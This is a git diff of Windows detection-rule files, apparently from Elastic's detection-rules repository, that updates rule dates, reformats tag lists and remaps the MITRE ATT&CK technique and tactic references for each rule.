+id = "T1127" +name = "Trusted Developer Utilities Proxy Execution" +reference = "https://attack.mitre.org/techniques/T1127/" + +[[rule.threat.technique.subtechnique]] +id = "T1127.001" +name = "MSBuild" +reference = "https://attack.mitre.org/techniques/T1127/001/" + [[rule.threat.technique]] id = "T1218" name = "System Binary Proxy Execution" reference = "https://attack.mitre.org/techniques/T1218/" + [[rule.threat.technique.subtechnique]] id = "T1218.005" name = "Mshta" reference = "https://attack.mitre.org/techniques/T1218/005/" +[[rule.threat.technique.subtechnique]] +id = "T1218.007" +name = "Msiexec" +reference = "https://attack.mitre.org/techniques/T1218/007/" + [[rule.threat.technique.subtechnique]] id = "T1218.010" name = "Regsvr32" @@ -105,18 +122,19 @@ id = "T1218.011" name = "Rundll32" reference = "https://attack.mitre.org/techniques/T1218/011/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" @@ -127,10 +145,7 @@ id = "T1059.003" name = "Windows Command Shell" reference = "https://attack.mitre.org/techniques/T1059/003/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - diff --git a/rules/windows/defense_evasion_suspicious_managedcode_host_process.toml b/rules/windows/defense_evasion_suspicious_managedcode_host_process.toml index 30a19f5a7ff..74f123093a7 100644 --- a/rules/windows/defense_evasion_suspicious_managedcode_host_process.toml +++ b/rules/windows/defense_evasion_suspicious_managedcode_host_process.toml @@ -2,7 +2,7 @@ creation_date = "2020/08/21" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -64,19 +64,7 @@ references = [ risk_score = 73 rule_id = "acf738b5-b5b2-4acc-bad9-1e18ee234f40" severity = "high" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Defense Evasion", - "Data Source: Elastic Defend", - "Data Source: Sysmon", - "Data Source: Microsoft Defender for Endpoint", - "Data Source: SentinelOne", - "Data Source: Elastic Endgame", - "Data Source: Crowdstrike", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Execution", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: Microsoft Defender for Endpoint", "Data Source: SentinelOne", "Data Source: Elastic Endgame", "Data Source: Crowdstrike", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" @@ -95,14 +83,51 @@ file where host.os.type == "windows" and event.type != "deletion" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] -id = "T1055" -name = "Process Injection" -reference = "https://attack.mitre.org/techniques/T1055/" +id = "T1218" +name = "System Binary Proxy Execution" +reference = "https://attack.mitre.org/techniques/T1218/" + +[[rule.threat.technique.subtechnique]] +id = "T1218.003" +name = "CMSTP" +reference = "https://attack.mitre.org/techniques/T1218/003/" + +[[rule.threat.technique.subtechnique]] +id = "T1218.005" +name = "Mshta" +reference = "https://attack.mitre.org/techniques/T1218/005/" +[[rule.threat.technique.subtechnique]] +id = "T1218.010" +name = "Regsvr32" +reference = "https://attack.mitre.org/techniques/T1218/010/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1047" +name = "Windows Management Instrumentation" +reference = "https://attack.mitre.org/techniques/T1047/" + +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[[rule.threat.technique]] +id = "T1129" +name = "Shared Modules" +reference = "https://attack.mitre.org/techniques/T1129/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/windows/defense_evasion_suspicious_process_access_direct_syscall.toml b/rules/windows/defense_evasion_suspicious_process_access_direct_syscall.toml index 3c06a0f9e98..4261e75d036 100644 --- a/rules/windows/defense_evasion_suspicious_process_access_direct_syscall.toml +++ b/rules/windows/defense_evasion_suspicious_process_access_direct_syscall.toml @@ -2,7 +2,7 @@ creation_date = "2021/10/11" integration = ["windows"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [transform] [[transform.osquery]] @@ -111,15 +111,7 @@ Hence for this rule to work effectively, users will need to add a custom ingest For more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html """ severity = "high" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Defense Evasion", - "Tactic: Execution", - "Resources: Investigation Guide", - "Data Source: Sysmon", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Execution", "Resources: Investigation Guide", "Data Source: Sysmon"] timestamp_override = "event.ingested" type = "eql" @@ -149,26 +141,13 @@ process where host.os.type == "windows" and event.code == "10" and [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1055" -name = "Process Injection" -reference = "https://attack.mitre.org/techniques/T1055/" - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" -[[rule.threat]] -framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1106" name = "Native API" reference = "https://attack.mitre.org/techniques/T1106/" - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - diff --git a/rules/windows/defense_evasion_suspicious_scrobj_load.toml b/rules/windows/defense_evasion_suspicious_scrobj_load.toml index 8b30df05e2c..0a146be32cf 100644 --- a/rules/windows/defense_evasion_suspicious_scrobj_load.toml +++ b/rules/windows/defense_evasion_suspicious_scrobj_load.toml @@ -2,7 +2,7 @@ creation_date = "2020/09/02" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -94,19 +94,13 @@ any where host.os.type == "windows" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1218" name = "System Binary Proxy Execution" reference = "https://attack.mitre.org/techniques/T1218/" -[[rule.threat.technique.subtechnique]] -id = "T1218.010" -name = "Regsvr32" -reference = "https://attack.mitre.org/techniques/T1218/010/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/windows/defense_evasion_suspicious_wmi_script.toml b/rules/windows/defense_evasion_suspicious_wmi_script.toml index 45706563ed1..a429935529b 100644 --- a/rules/windows/defense_evasion_suspicious_wmi_script.toml +++ b/rules/windows/defense_evasion_suspicious_wmi_script.toml @@ -2,7 +2,7 @@ creation_date = "2020/09/02" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -58,16 +58,7 @@ Windows Management Instrumentation Command-line (WMIC) is a powerful tool for ma risk_score = 47 rule_id = "7f370d54-c0eb-4270-ac5a-9a6020585dc6" severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Defense Evasion", - "Tactic: Execution", - "Data Source: Elastic Defend", - "Data Source: Sysmon", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Data Source: Elastic Defend", "Data Source: Sysmon", "Resources: Investigation Guide"] type = "eql" query = ''' @@ -83,26 +74,13 @@ sequence by process.entity_id with maxspan = 2m [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1220" name = "XSL Script Processing" reference = "https://attack.mitre.org/techniques/T1220/" - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1047" -name = "Windows Management Instrumentation" -reference = "https://attack.mitre.org/techniques/T1047/" - - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" - diff --git a/rules/windows/defense_evasion_suspicious_zoom_child_process.toml b/rules/windows/defense_evasion_suspicious_zoom_child_process.toml index 2b461a36b16..ed4551b154d 100644 --- a/rules/windows/defense_evasion_suspicious_zoom_child_process.toml +++ b/rules/windows/defense_evasion_suspicious_zoom_child_process.toml @@ -2,7 +2,7 @@ creation_date = "2020/09/03" integration = ["endpoint", "windows", "sentinel_one_cloud_funnel", "m365_defender", "system", "crowdstrike"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [transform] [[transform.osquery]] @@ -105,21 +105,7 @@ This rule identifies a potential malicious process masquerading as `Zoom.exe` or risk_score = 47 rule_id = "97aba1ef-6034-4bd3-8c1a-1e0996b27afa" severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Defense Evasion", - "Tactic: Execution", - "Data Source: Elastic Endgame", - "Resources: Investigation Guide", - "Data Source: Elastic Defend", - "Data Source: SentinelOne", - "Data Source: Microsoft Defender for Endpoint", - "Data Source: Windows Security Event Logs", - "Data Source: Crowdstrike", - "Data Source: Sysmon", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Execution", "Data Source: Elastic Endgame", "Resources: Investigation Guide", "Data Source: Elastic Defend", "Data Source: SentinelOne", "Data Source: Microsoft Defender for Endpoint", "Data Source: Windows Security Event Logs", "Data Source: Crowdstrike", "Data Source: Sysmon"] timestamp_override = "event.ingested" type = "eql" @@ -131,31 +117,23 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1036" -name = "Masquerading" -reference = "https://attack.mitre.org/techniques/T1036/" [[rule.threat.technique]] -id = "T1055" -name = "Process Injection" -reference = "https://attack.mitre.org/techniques/T1055/" +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" +[[rule.threat.technique.subtechnique]] +id = "T1059.001" +name = "PowerShell" +reference = "https://attack.mitre.org/techniques/T1059/001/" -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1203" -name = "Exploitation for Client Execution" -reference = "https://attack.mitre.org/techniques/T1203/" - +[[rule.threat.technique.subtechnique]] +id = "T1059.003" +name = "Windows Command Shell" +reference = "https://attack.mitre.org/techniques/T1059/003/" [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - diff --git a/rules/windows/defense_evasion_system_critical_proc_abnormal_file_activity.toml b/rules/windows/defense_evasion_system_critical_proc_abnormal_file_activity.toml index 5c5acb3734e..c61e96383d9 100644 --- a/rules/windows/defense_evasion_system_critical_proc_abnormal_file_activity.toml +++ b/rules/windows/defense_evasion_system_critical_proc_abnormal_file_activity.toml @@ -2,7 +2,7 @@ creation_date = "2020/08/19" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/08/26" +updated_date = "2026/03/23" [transform] [[transform.osquery]] @@ -102,20 +102,7 @@ This rule looks for the creation of executable files done by system-critical pro risk_score = 73 rule_id = "e94262f2-c1e9-4d3f-a907-aeab16712e1a" severity = "high" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Defense Evasion", - "Tactic: Execution", - "Resources: Investigation Guide", - "Data Source: Elastic Endgame", - "Data Source: Elastic Defend", - "Data Source: Sysmon", - "Data Source: Microsoft Defender for Endpoint", - "Data Source: SentinelOne", - "Data Source: Crowdstrike", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Privilege Escalation", "Resources: Investigation Guide", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: Microsoft Defender for Endpoint", "Data Source: SentinelOne", "Data Source: Crowdstrike"] timestamp_override = "event.ingested" type = "eql" @@ -136,26 +123,26 @@ file where host.os.type == "windows" and event.type != "deletion" and [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1211" -name = "Exploitation for Defense Evasion" -reference = "https://attack.mitre.org/techniques/T1211/" +[[rule.threat.technique]] +id = "T1055" +name = "Process Injection" +reference = "https://attack.mitre.org/techniques/T1055/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1203" -name = "Exploitation for Client Execution" -reference = "https://attack.mitre.org/techniques/T1203/" +[[rule.threat.technique]] +id = "T1055" +name = "Process Injection" +reference = "https://attack.mitre.org/techniques/T1055/" [rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" - +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/windows/defense_evasion_unsigned_dll_loaded_from_suspdir.toml b/rules/windows/defense_evasion_unsigned_dll_loaded_from_suspdir.toml index 0828b1440b9..8202a95a100 100644 --- a/rules/windows/defense_evasion_unsigned_dll_loaded_from_suspdir.toml +++ b/rules/windows/defense_evasion_unsigned_dll_loaded_from_suspdir.toml @@ -2,7 +2,7 @@ creation_date = "2022/11/22" integration = ["endpoint"] maturity = "production" -updated_date = "2026/01/21" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -165,29 +165,18 @@ library where host.os.type == "windows" and [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1036" -name = "Masquerading" -reference = "https://attack.mitre.org/techniques/T1036/" -[[rule.threat.technique.subtechnique]] -id = "T1036.001" -name = "Invalid Code Signature" -reference = "https://attack.mitre.org/techniques/T1036/001/" - [[rule.threat.technique]] id = "T1574" name = "Hijack Execution Flow" reference = "https://attack.mitre.org/techniques/T1574/" + [[rule.threat.technique.subtechnique]] id = "T1574.001" name = "DLL" reference = "https://attack.mitre.org/techniques/T1574/001/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/windows/defense_evasion_untrusted_driver_loaded.toml b/rules/windows/defense_evasion_untrusted_driver_loaded.toml index c9a0df30ca0..3d950d40f57 100644 --- a/rules/windows/defense_evasion_untrusted_driver_loaded.toml +++ b/rules/windows/defense_evasion_untrusted_driver_loaded.toml @@ -2,7 +2,7 @@ creation_date = "2023/01/27" integration = ["endpoint"] maturity = "production" -updated_date = "2025/09/04" +updated_date = "2026/03/23" [transform] [[transform.osquery]] @@ -119,19 +119,18 @@ driver where host.os.type == "windows" and process.pid == 4 and [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1036" -name = "Masquerading" -reference = "https://attack.mitre.org/techniques/T1036/" -[[rule.threat.technique.subtechnique]] -id = "T1036.001" -name = "Invalid Code Signature" -reference = "https://attack.mitre.org/techniques/T1036/001/" +[[rule.threat.technique]] +id = "T1553" +name = "Subvert Trust Controls" +reference = "https://attack.mitre.org/techniques/T1553/" +[[rule.threat.technique.subtechnique]] +id = "T1553.006" +name = "Code Signing Policy Modification" +reference = "https://attack.mitre.org/techniques/T1553/006/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/windows/defense_evasion_unusual_network_connection_via_dllhost.toml b/rules/windows/defense_evasion_unusual_network_connection_via_dllhost.toml index ef3d4c6c627..0ad876a1e83 100644 --- a/rules/windows/defense_evasion_unusual_network_connection_via_dllhost.toml +++ b/rules/windows/defense_evasion_unusual_network_connection_via_dllhost.toml @@ -2,7 +2,7 @@ creation_date = "2021/05/28" integration = ["endpoint", "windows", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/08/28" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -62,16 +62,7 @@ references = [ risk_score = 47 rule_id = "c7894234-7814-44c2-92a9-f7d851ea246a" severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Defense Evasion", - "Data Source: Elastic Defend", - "Data Source: Sysmon", - "Resources: Investigation Guide", - "Data Source: SentinelOne", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Command and Control", "Tactic: Defense Evasion", "Data Source: Elastic Defend", "Data Source: Sysmon", "Resources: Investigation Guide", "Data Source: SentinelOne"] type = "eql" query = ''' @@ -88,14 +79,26 @@ sequence by host.id, process.entity_id with maxspan=1m [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1071" +name = "Application Layer Protocol" +reference = "https://attack.mitre.org/techniques/T1071/" + +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1218" name = "System Binary Proxy Execution" reference = "https://attack.mitre.org/techniques/T1218/" - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/windows/defense_evasion_unusual_network_connection_via_rundll32.toml b/rules/windows/defense_evasion_unusual_network_connection_via_rundll32.toml index f2db06b1ae8..73a80fd10f8 100644 --- a/rules/windows/defense_evasion_unusual_network_connection_via_rundll32.toml +++ b/rules/windows/defense_evasion_unusual_network_connection_via_rundll32.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" integration = ["endpoint", "windows", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/08/28" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -93,36 +93,31 @@ sequence by host.id, process.entity_id with maxspan=1m [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1071" +name = "Application Layer Protocol" +reference = "https://attack.mitre.org/techniques/T1071/" + +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1218" name = "System Binary Proxy Execution" reference = "https://attack.mitre.org/techniques/T1218/" + [[rule.threat.technique.subtechnique]] id = "T1218.011" name = "Rundll32" reference = "https://attack.mitre.org/techniques/T1218/011/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1071" -name = "Application Layer Protocol" -reference = "https://attack.mitre.org/techniques/T1071/" -[[rule.threat.technique.subtechnique]] -id = "T1071.001" -name = "Web Protocols" -reference = "https://attack.mitre.org/techniques/T1071/001/" - - - -[rule.threat.tactic] -id = "TA0011" -name = "Command and Control" -reference = "https://attack.mitre.org/tactics/TA0011/" - diff --git a/rules/windows/defense_evasion_unusual_process_network_connection.toml b/rules/windows/defense_evasion_unusual_process_network_connection.toml index 8dd19e5c315..89a760e9d11 100644 --- a/rules/windows/defense_evasion_unusual_process_network_connection.toml +++ b/rules/windows/defense_evasion_unusual_process_network_connection.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" integration = ["endpoint", "windows", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/08/26" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -95,14 +95,33 @@ sequence by process.entity_id [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1127" name = "Trusted Developer Utilities Proxy Execution" reference = "https://attack.mitre.org/techniques/T1127/" +[[rule.threat.technique.subtechnique]] +id = "T1127.002" +name = "ClickOnce" +reference = "https://attack.mitre.org/techniques/T1127/002/" + +[[rule.threat.technique]] +id = "T1218" +name = "System Binary Proxy Execution" +reference = "https://attack.mitre.org/techniques/T1218/" + +[[rule.threat.technique.subtechnique]] +id = "T1218.003" +name = "CMSTP" +reference = "https://attack.mitre.org/techniques/T1218/003/" + +[[rule.threat.technique.subtechnique]] +id = "T1218.008" +name = "Odbcconf" +reference = "https://attack.mitre.org/techniques/T1218/008/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/windows/defense_evasion_wdac_policy_by_unusual_process.toml b/rules/windows/defense_evasion_wdac_policy_by_unusual_process.toml index 236dce5f9bd..83c9d170fec 100644 --- a/rules/windows/defense_evasion_wdac_policy_by_unusual_process.toml +++ b/rules/windows/defense_evasion_wdac_policy_by_unusual_process.toml @@ -2,7 +2,7 @@ creation_date = "2025/02/28" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/08/26" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -91,14 +91,18 @@ file where host.os.type == "windows" and event.action != "deletion" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" +[[rule.threat.technique.subtechnique]] +id = "T1562.001" +name = "Disable or Modify Tools" +reference = "https://attack.mitre.org/techniques/T1562/001/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/windows/defense_evasion_wsl_bash_exec.toml b/rules/windows/defense_evasion_wsl_bash_exec.toml index f0dae674a7e..5e040493bbb 100644 --- a/rules/windows/defense_evasion_wsl_bash_exec.toml +++ b/rules/windows/defense_evasion_wsl_bash_exec.toml @@ -2,7 +2,7 @@ creation_date = "2023/01/13" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -64,19 +64,7 @@ references = [ risk_score = 21 rule_id = "3e0eeb75-16e8-4f2f-9826-62461ca128b7" severity = "low" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Execution", - "Tactic: Defense Evasion", - "Data Source: Elastic Endgame", - "Data Source: Elastic Defend", - "Data Source: Microsoft Defender for Endpoint", - "Data Source: Sysmon", - "Data Source: SentinelOne", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Execution", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Microsoft Defender for Endpoint", "Data Source: Sysmon", "Data Source: SentinelOne", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" @@ -103,31 +91,18 @@ process where host.os.type == "windows" and event.type : "start" and [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1202" -name = "Indirect Command Execution" -reference = "https://attack.mitre.org/techniques/T1202/" - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" -[[rule.threat]] -framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.004" name = "Unix Shell" reference = "https://attack.mitre.org/techniques/T1059/004/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - diff --git a/rules/windows/defense_evasion_wsl_enabled_via_dism.toml b/rules/windows/defense_evasion_wsl_enabled_via_dism.toml index 3fbc2682614..2c23fc934b5 100644 --- a/rules/windows/defense_evasion_wsl_enabled_via_dism.toml +++ b/rules/windows/defense_evasion_wsl_enabled_via_dism.toml @@ -2,7 +2,7 @@ creation_date = "2023/01/13" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -89,16 +89,3 @@ process where host.os.type == "windows" and event.type : "start" and ''' -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1202" -name = "Indirect Command Execution" -reference = "https://attack.mitre.org/techniques/T1202/" - - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/windows/defense_evasion_wsl_kalilinux.toml b/rules/windows/defense_evasion_wsl_kalilinux.toml index 1d34d559fbf..9c6fefe207c 100644 --- a/rules/windows/defense_evasion_wsl_kalilinux.toml +++ b/rules/windows/defense_evasion_wsl_kalilinux.toml @@ -2,7 +2,7 @@ creation_date = "2023/01/12" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/08/28" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -63,20 +63,7 @@ references = ["https://learn.microsoft.com/en-us/windows/wsl/wsl-config"] risk_score = 73 rule_id = "dd34b062-b9e3-4a6b-8c0c-6c8ca6dd450e" severity = "high" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Defense Evasion", - "Data Source: Elastic Endgame", - "Data Source: Elastic Defend", - "Data Source: Windows Security Event Logs", - "Data Source: Microsoft Defender for Endpoint", - "Data Source: Sysmon", - "Data Source: SentinelOne", - "Data Source: Crowdstrike", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Execution", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Windows Security Event Logs", "Data Source: Microsoft Defender for Endpoint", "Data Source: Sysmon", "Data Source: SentinelOne", "Data Source: Crowdstrike", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" @@ -100,14 +87,36 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] -id = "T1202" -name = "Indirect Command Execution" -reference = "https://attack.mitre.org/techniques/T1202/" +id = "T1564" +name = "Hide Artifacts" +reference = "https://attack.mitre.org/techniques/T1564/" +[[rule.threat.technique.subtechnique]] +id = "T1564.006" +name = "Run Virtual Instance" +reference = "https://attack.mitre.org/techniques/T1564/006/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.004" +name = "Unix Shell" +reference = "https://attack.mitre.org/techniques/T1059/004/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/windows/defense_evasion_wsl_registry_modification.toml b/rules/windows/defense_evasion_wsl_registry_modification.toml index ca02fcc756a..aaf9f735f05 100644 --- a/rules/windows/defense_evasion_wsl_registry_modification.toml +++ b/rules/windows/defense_evasion_wsl_registry_modification.toml @@ -2,7 +2,7 @@ creation_date = "2023/01/12" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/08/26" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -90,19 +90,13 @@ registry where host.os.type == "windows" and event.type == "change" and registry [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1112" name = "Modify Registry" reference = "https://attack.mitre.org/techniques/T1112/" -[[rule.threat.technique]] -id = "T1202" -name = "Indirect Command Execution" -reference = "https://attack.mitre.org/techniques/T1202/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/windows/discovery_active_directory_webservice.toml b/rules/windows/discovery_active_directory_webservice.toml index 56600c5238b..8f2800ee80d 100644 --- a/rules/windows/discovery_active_directory_webservice.toml +++ b/rules/windows/discovery_active_directory_webservice.toml @@ -2,7 +2,7 @@ creation_date = "2024/01/31" integration = ["endpoint"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -83,14 +83,18 @@ Active Directory Web Service (ADWS) facilitates querying Active Directory (AD) o [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1018" name = "Remote System Discovery" reference = "https://attack.mitre.org/techniques/T1018/" +[[rule.threat.technique]] +id = "T1087" +name = "Account Discovery" +reference = "https://attack.mitre.org/techniques/T1087/" [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" - diff --git a/rules/windows/discovery_ad_explorer_execution.toml b/rules/windows/discovery_ad_explorer_execution.toml index 52e76151aca..7b4a261ca72 100644 --- a/rules/windows/discovery_ad_explorer_execution.toml +++ b/rules/windows/discovery_ad_explorer_execution.toml @@ -2,7 +2,7 @@ creation_date = "2025/09/01" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/09/01" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 